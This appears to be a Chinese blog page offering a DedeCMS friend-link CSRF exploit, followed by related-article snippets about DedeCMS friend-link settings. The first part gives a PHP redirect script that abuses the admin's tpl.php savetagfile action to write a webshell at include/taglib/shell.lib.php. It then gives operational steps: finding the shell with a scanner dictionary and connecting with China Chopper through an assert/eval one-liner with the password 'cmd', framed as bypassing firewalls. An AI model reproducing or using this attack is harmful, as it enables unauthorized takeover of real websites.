过防火墙一句话php2017,dedeCMS友情链接getshell漏洞利用
1.php
//print_r($_SERVER);
$referer = $_SERVER['HTTP_REFERER'];
$dede_login = str_replace("friendlink_main.php","",$referer);//去掉friendlink_main.php,取得dede后台的路径
//拼接 exp
$muma = ''.'';
$exp = 'tpl.php?action=savetagfile&actiondo=addnewtag&content='. $muma .'&filename=shell.lib.php';
$url = $dede_login.$exp;
//echo $url;
header("location: ".$url);
// send mail coder
exit();
?>
把1.php上传到你的空间域名
站长审核后台友情连接 后生成一句话地址为http://hack1990.com//include/taglib/shell.lib.php
御剑字典添加/include/taglib/shell.lib.php测试是否存活即可
最后菜刀访问传参一句话http://hack1990.com//include/taglib/shell.lib.php?a=assert&b[0]=@eval($_POST[cmd]);
密码为cmd
过简单防火墙
过防火墙一句话php2017,dedeCMS友情链接getshell漏洞利用相关推荐
- dedecms友情链接plus/flink.php页面出错,DedeCMS友情链接flink_add Getshell漏洞管理员CSRF漏洞...
DedeCMS友情链接漏洞,DedeCMS漏洞, 1.漏洞利用 由于tpl.php中的$action,$content,$filename变量没有初始化,从而能操纵这些变量写入任意的代码. 又由于应用 ...
- dedecms友情链接plus/flink.php页面出错,dedecms友情链接flink的调用方法
标记名称:flink [标签简介] [功能说明]:用于获取友情链接,其对应后台文件为"includetaglibflink.lib.php". [适用范围]:全局标记,适用V55, ...
- dedecms友情链接plus/flink.php页面出错,织梦DedeCMS默认友情链接等页面的安全隐患...
织梦DedeCMS的好处什么的就不说了,今天主要讲一下织梦默认的设置里面一些可能会暴露网站模板路径的安全隐患.有人会说织梦模板的路径暴露了有什么的,当然这个路径是非常重要的了,如果你的系统未进行一些相 ...
- dedecms友情链接字数修改
织梦系统在默认的情况下,统一类型下最多能显示24个链接,每个链接最多显示24个字节.如果想要更改,必须修改flink.lib文件: 在织梦文件夹中找到文件 \ include \ taglib \ f ...
- DedeCMS 友情链接按分类网站类型调用的方法
标签名称:flink 标记简介: 功能说明:用于获取友情链接 适用范围:全局使用 基本语法: {dede:flink row='24'/} 参数说明: type='image' 或textall,图片 ...
- Drupal 7.31SQL注入getshell漏洞利用详解及EXP
0x00 这个漏洞威力确实很大,而且Drupal用的也比较多,使用Fuzzing跑字典应该可以扫出很多漏洞主机,但是做批量可能会对对方网站造成很大的损失,所以我也就只是写个Exp不再深入下去. 0x0 ...
- 织梦DeDeCMS友情链接文字显示不全
文件:/include/taglib/flink.lib.php 把下面代码中的24改为合适的值 $attlist="type|textall,row|24,titlelen|24,link ...
- 三个快速有效的交换友情链接的方法
三个快速有效的交换友情链接的方法 如今,开源建站程序是站长们最常见的,很多站长们都是通过开源建站程序来建设属于自己的网站,到目前未知开源建站程序大同小异,有PHP语音的也有ASP语言的,从最早的dis ...
- 织梦友情链接html,DedeCMS首页内页友情链接灵活调用
大家在交换友情链接的时候,想把PR值低于自己网站的链接设置为内页,但更新页面后,原本设置为内页显示的连接还是跑到了首页. 这个问题一直让很多使用织梦CMS的站长很头疼,在论坛也找不到解决方法,本来我想 ...
最新文章
- php程序耗时是负数,php 代码测试,代码越在前面越耗时
- HDU2019 数列有序
- 前端学习资料及路线名称网站
- HtmlHelper让我们的效率更高
- WordPress简约昼夜切换导航NDNAV主题模板
- matlab怎样设置中文界面
- 2017 linux wine 迅雷,wine 迅雷下载安装(wine 迅雷极速版)【Linux上用迅雷7】
- 爬虫工程师是干嘛的?Python爬虫工程师需要掌握哪些技能?
- 算法基础系列第三章——图论之最小生成树问题
- nginx安装部署和配置管理
- 用pip安装指定版本的包遇到的坑
- http://www.cnblogs.com/xinxin-csharp/p/6146770.html
- 有声音显示音频服务器,Win7右下角声音图标显示音频服务未运行的解决方法小结...
- 本科毕业论文的引言怎么写?
- 基于微信小程序的网上电影购票的设计与实现
- Django3+Vue美多商城项目的总结
- 囚徒困境困境_社会困境我们主演的恐怖电影
- 广和通5G模组成功联调基于高通IPQ系列+骁龙X62的5G CPE方案,已实现大规模量产
- 峰值,平均值,准峰值检波器
- 进程(六):进程池(Pool)